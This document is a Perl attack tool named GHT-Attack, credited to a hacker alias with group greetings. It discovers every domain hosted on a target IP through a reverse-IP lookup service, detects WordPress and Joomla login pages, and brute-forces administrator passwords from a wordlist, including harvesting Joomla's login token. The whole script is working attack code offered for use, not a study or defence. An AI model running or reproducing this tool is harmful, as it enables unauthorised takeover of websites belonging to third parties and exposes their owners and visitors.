GHT-ATTacK

1. #!/usr/bin/perl
2. if($^O =~ /Win/){
3.  
4.    system("cls");
5.  
6. }else{
7.  
8.    system("clear");
9. }
10. use HTTP::Request;
11. use LWP::UserAgent;
12.  
13. print q{
14. ###############################################################################
15. #                                                                             #
16. #  ####   ##  ##  ######        ####   ######  ######   ####    ####   ##  ## #
17. # ##      ##  ##    ##         ##  ##    ##      ##    ##  ##  ##  ##  ## ##  #
18. # ## ###  ######    ## ######  ######    ##      ##    ######  ##      ####   #
19. # ##  ##  ##  ##    ##         ##  ##    ##      ##    ##  ##  ##  ##  ## ##  #
20. #  ####   ##  ##    ##         ##  ##    ##      ##    ##  ##   ####   ##  ## #
21. #                                                                             #
22. ###############################################################################
23.  
24.  
25. };
26. print "\n";
27. menu:;
28. print "1. ReserVe Ip";
29. print "\n2. Wordpress Brute Force";
30. print "\n3. Joomla Brute Force";
31. print "\n4. Info ";
32.  
33. print "\n\nr00t~GHT: ";
34. $menu = <>;
35. if ($menu =~ /1/){
36.     goto Reserve
37.     }
38.     if ($menu =~ /2/){
39.         goto wordpress;
40.     }
41.     if ($menu =~ /3/){
42.         goto joomla;
43.     }
44.     if ($menu =~ /4/){
45.         goto Info;
46.     }
47.     else {
48.  
49.         print "\t\tUnknow Choise!\n";
50.         goto menu;
51.     };
52. Reserve:;
53. if($^O =~ /Win/){
54.  
55.    system("cls");
56.  
57. }else{
58.  
59.    system("clear");
60. }
61. print q{
62.  __________
63.  \______   \____   ______ ______________  __ ____
64.  |       _// __ \ /  ___// __ \_  __ \  \/ // __ \
65.  |    |   \  ___/ \___ \\  ___/|  | \/\   /\  ___/
66.  |____|_  /\___  >____  >\___  >__|    \_/  \___  >
67.         \/     \/     \/     \/                 \/
68. };
69. print "\n[!] Insert Target Name or IP Adress : ";
70. $ip=<STDIN>;
71. chomp($ip);
72. print "\n[!] Grabbing Domains From $ip...\n\n";
73. use LWP::UserAgent;
74. use XML::Simple;
75. use HTTP::Request;
76. my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
77. my $rp = $ua->post('http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php',
78. {
79.         remoteAddress => $ip,
80. }
81. );
82.  
83. my $dresult = $rp->content;
84. while ($dresult =~ m/\[([^\]]*)\]/g)
85. {
86.         $imatch = $1;
87.         $imatch =~ m/\"(.*?)\", \"?\"/g;
88. open(a, ">>domains.txt");
89. print a "$1\n";
90. close(a);
91. }
92. if ($dresult =~ m/"message":"Daily reverse IP check limit reached for (.*)\. Please <a href='\/about'>contact<\/a> me to remove this limit\."/)
93. {
94. print "[-] Sorry Domains Cannot Be Listed now";
95. }
96. open (DOMAINS, "<domains.txt") || die "[-] Error Can't open Domains Names List ";
97. @DOMAINS = <DOMAINS>;
98. close PASSFILE;
99. foreach my $D (@DOMAINS) {
100. chomp $D;
101. $wp = "http://".$D."/wp-login.php";
102. my $reqwp=HTTP::Request->new(GET=>$wp);
103. my $uawp=LWP::UserAgent->new();
104. $uawp->timeout(30);
105. my $responsewp=$uawp->request($reqwp);
106.  
107. $joom = "http://".$D."/administrator/";
108. my $reqjoom=HTTP::Request->new(GET=>$joom);
109. my $uajoom=LWP::UserAgent->new();
110. $uajoom->timeout(30);
111. my $responsejoom=$uawp->request($reqjoom);
112.  
113. if ($responsewp->content=~ /<body class="login">/){print "[+] $D :[Wordpress]\n";}
114. else{
115. if ($responsejoom->content=~ /Joomla!/){print "[+] $D :[Joomla]\n";}
116. else {print "[-] $D :[Unknown] \n";}
117.  
118. }
119. }
120. wordpress:;
121. if($^O =~ /Win/){
122.  
123.    system("cls");
124.  
125. }else{
126.  
127.    system("clear");
128. }
129. sub trim($);
130. print q{
131.  __      __                  ___.                 __
132. /  \    /  \______           \_ |_________ __ ___/  |_  ____
133. \   \/\/   /\____ \   ______  | __ \_  __ \  |  \   __\/ __ \
134.  \        / |  |_> > /_____/  | \_\ \  | \/  |  /|  | \  ___/
135.   \__/\  /  |   __/           |___  /__|  |____/ |__|  \___  >
136.        \/   |__|                  \/                       \/
137. };
138. print "\n\nTarget (Without Http://) or Ip Adress : ";
139. $ip = <STDIN>;
140. chomp($ip);
141. print "\nUser : ";
142. $ulist = <STDIN>;
143. chomp($ulist);
144.  
145. print "\nEnter Password List : ";
146. $list = <STDIN>;
147. chomp($list);
148. if($ip =~ /.txt/) {
149. print "\n[!] Listing Domains From $ip ...\n\n";
150. open (DOMAINS, "<$ip") || die "[-] ErroR Can't open Domains Names List !!";
151. @DOMAINS = <DOMAINS>;
152. close DOMAINS;
153. }else{
154. print "\n[!] Grabbing Domains From $ip ...\n\n";
155. use LWP::UserAgent;
156. use HTTP::Request;
157. my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
158.  
159.  
160. my $rp = $ua->post('http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php',
161. {
162.         remoteAddress => $ip,
163. }
164. );
165.  
166. my $dresult = $rp->content;
167. while ($dresult =~ m/\[([^\]]*)\]/g)
168. {
169.         $imatch = $1;
170.         $imatch =~ m/\"(.*?)\", \"?\"/g;
171. open(a, ">>domains-$ip.txt");
172. print a "$1\n";
173. close(a);
174. }
175. if ($dresult =~ m/"message":"Daily reverse IP check limit reached for (.*)\. Please <a href='\/about'>contact<\/a> me to remove this limit\."/)
176. {
177. print "[-] Sorry Domains Cannot Be Listed now\n\n";
178. }
179. open (DOMAINS, "<domains-$ip.txt") || die "[-] Can't open the List Of Domains Names!";
180. @DOMAINS = <DOMAINS>;
181. close DOMAINS;
182. }
183. foreach my $D (@DOMAINS) {
184. chomp $D;
185. $wp = "http://".$D."/wp-login.php";
186. my $reqwp=HTTP::Request->new(GET=>$wp);
187. my $uawp=LWP::UserAgent->new();
188. $uawp->timeout(20);
189. my $responsewp=$uawp->request($reqwp);
190. if ($responsewp->content=~ /<body class="login">/){
191. print "[-]Wordpress WebSites SelecTed \n";
192. print "[-]Target : $D\n";
193. use LWP::UserAgent;
194.     use URI::URL;
195.     use HTTP::Request;
196.     use HTTP::Request::Common qw(POST);
197.     use HTTP::Request::Common qw(GET);
198. print "[-]Brutting $D ...\n\n";
199. use LWP::UserAgent;
200. my $useragaint = new LWP::UserAgent;
201. open (PASSFILE, "<$list") || die "[-] ErroR Can't Open Passwords List !";
202. @LISTS = <PASSFILE>;
203. close PASSFILE;
204. foreach my $L (@LISTS) {
205. chomp $L;
206. $pwd = trim($L);
207.  
208.  
209. my $response = $useragaint->post($wp,
210. {
211. "log"   => "$ulist",
212. "pwd"   => "$pwd",
213. });
214.  
215. if ($content = $response->content=~ /<div id="login_error">/)
216.  
217. {
218.  
219. }
220. else {
221. print "\n\n\t[+] Password Found !! \n";
222. print "\t[+] Username : $ulist\n";
223. print "\t[+] Password : $pwd\n\n\n";
224. }
225. }
226. }
227. }
228. sub trim($)
229. {
230.     my $string = shift;
231.     $string =~ s/^\s+//;
232.     $string =~ s/\s+$//;
233.     return $string;
234. }
235. joomla:;
236.  
237. if($^O =~ /Win/){
238.  
239.    system("cls");
240.  
241. }else{
242.  
243.    system("clear");
244. }
245. print q{
246.      ____.                               __________                __
247.     |    | ____   ____   _____           \______   \_______ __ ___/  |_
248.     |    |/  _ \ /  _ \ /     \   ______  |    |  _/\_  __ \  |  \   __\
249. /\__|    (  <_> |  <_> )  Y Y  \ /_____/  |    |   \ |  | \/  |  /|  |
250. \________|\____/ \____/|__|_|  /          |______  / |__|  |____/ |__|
251.                              \/                  \/
252.  
253. };
254. print "\n\nTarget (Without Http://) or Ip Adress : ";
255. $ip = <STDIN>;
256. chomp($ip);
257. print "Admin Name: ";
258. $ulist = <STDIN>;
259. chomp($ulist);
260. print "Pass List: ";
261. $list = <STDIN>;
262. chomp($list);
263. if($ip =~ /.txt/) {
264. print "\n[!] Listing Domains From $ip \n\n";
265. open (DOMAINS, "<$ip") || die "[-] Can't open the List Of Domains Names!";
266. @DOMAINS = <DOMAINS>;
267. close DOMAINS;
268. }else{
269. print "\n[!] Grabbing Domains From $ip ...\n\n";
270. use LWP::UserAgent;
271. use HTTP::Request;
272. my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
273.  
274.  
275. my $rp = $ua->post('http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php',
276. {
277.         remoteAddress => $ip,
278. }
279. );
280.  
281. my $dresult = $rp->content;
282. while ($dresult =~ m/\[([^\]]*)\]/g)
283. {
284.         $imatch = $1;
285.         $imatch =~ m/\"(.*?)\", \"?\"/g;
286. open(a, ">>$ip.txt");
287. print a "$1\n";
288. close(a);
289. }
290. if ($dresult =~ m/"message":"Daily reverse IP check limit reached for (.*)\. Please <a href='\/about'>contact<\/a> me to remove this limit\."/)
291. {
292. print "[-] Sorry Domains Cannot Be Listed now\n\n";
293. }
294. open (DOMAINS, "<$ip.txt") || die "[-] Can't open the List Of Domains Names!";
295. @DOMAINS = <DOMAINS>;
296. close DOMAINS;
297. }
298. foreach my $D (@DOMAINS) {
299. chomp $D;
300. $joom = "http://".$D."/administrator/index.php";
301. my $reqjoom=HTTP::Request->new(GET=>$joom);
302. my $uajoom=LWP::UserAgent->new();
303. $uajoom->timeout(0);
304. my $responsejoom=$uajoom->request($reqjoom);
305. if ($responsejoom->is_success && $responsejoom->content=~ /Joomla/){
306.  use LWP::UserAgent;
307.     use URI::URL;
308.     use HTTP::Request;
309.     use HTTP::Request::Common qw(POST);
310.     use HTTP::Request::Common qw(GET);
311.     use HTTP::Cookies;
312.       $ua = LWP::UserAgent->new(keep_alive => 1);
313. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
314. $ua->timeout (0);
315. $ua->cookie_jar(
316.         HTTP::Cookies->new(
317.             file => 'mycookies.txt',
318.             autosave => 1
319.         )
320.     );
321.  
322. print "\n[-]Joomla WebSites SelecTed \n";
323. print "[-]Target : $D\n";
324. print "[!]Brutting $D \n\n";
325.  my $red = GET $joom;
326. my $ret = $ua->request($red);
327. $rep =  $ret->content;
328. $status = $ret->status_line;
329. if ( $rep =~ m#(name=")(.*)" value="1"# ) {
330. $token = $2 ;
331. }else{
332. die "[-] Can't Grabb Joomla Token !";
333. }
334.  use LWP::UserAgent;
335. my $useragaint = new LWP::UserAgent;
336. open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
337. @LISTS = <PASSFILE>;
338. close PASSFILE;
339. foreach my $L (@LISTS) {
340. chomp $L;
341. $pwd = trim($L);
342. my $response = $ua->post($joom,
343. {
344. "username"   => "$ulist",
345. "passwd"   => "$pwd",
346. "lang"   => "en-GB",
347. "option"   => "com_login",
348. "task"   => "login",
349. "$token"   => "1",
350. });
351. $pwnd = $response->status_line;
352. if ($pwnd =~ /303/ | $pwnd =~ /301/){
353. print "\n\n\t[+] Password Found !! \n";
354. print "\t[+] Username : $ulist\n";
355. print "\t[+] Password : $pwd\n\n\n";
356. }
357. else {
358.  
359. print "\t[-] $pwd Not Found \n";
360.  
361. }
362. }
363. sub trim($)
364. {
365.     my $string = shift;
366.     $string =~ s/^\s+//;
367.     $string =~ s/\s+$//;
368.     return $string;
369. }
370. }
371. }
372. Info:;
373. if($^O =~ /Win/){
374.  
375.    system("cls");
376.  
377. }else{
378.  
379.    system("clear");
380. }
381. print q{
382. ###############################################################################
383. #                                                                             #
384. #  ####   ##  ##  ######        ####   ######  ######   ####    ####   ##  ## #
385. # ##      ##  ##    ##         ##  ##    ##      ##    ##  ##  ##  ##  ## ##  #
386. # ## ###  ######    ## ######  ######    ##      ##    ######  ##      ####   #
387. # ##  ##  ##  ##    ##         ##  ##    ##      ##    ##  ##  ##  ##  ## ##  #
388. #  ####   ##  ##    ##         ##  ##    ##      ##    ##  ##   ####   ##  ## #
389. #                                                                             #
390. ###############################################################################
391.  
392. #                          GHT-Attack
393. #                     Author  : Mr_AnarShi-T
394. #                    Home  : GaZa-HacKeR.NeT
395. #                          GreeT's :
396. #                   Mr.le0n / Claw / Casper
397. #                 Qarasinat Gaza / zero_cool
398. #   TKL , FOXY , BlackRose , ab0-m3az , Th-Mx , ehabneo , gl 7
399. #     HANINE , MaGnOm , Micha , Mr@T0rJan , Victim , llord
400. #        zaradusht , Riah Anasr  , abath, aywanvictori
401.  
402. };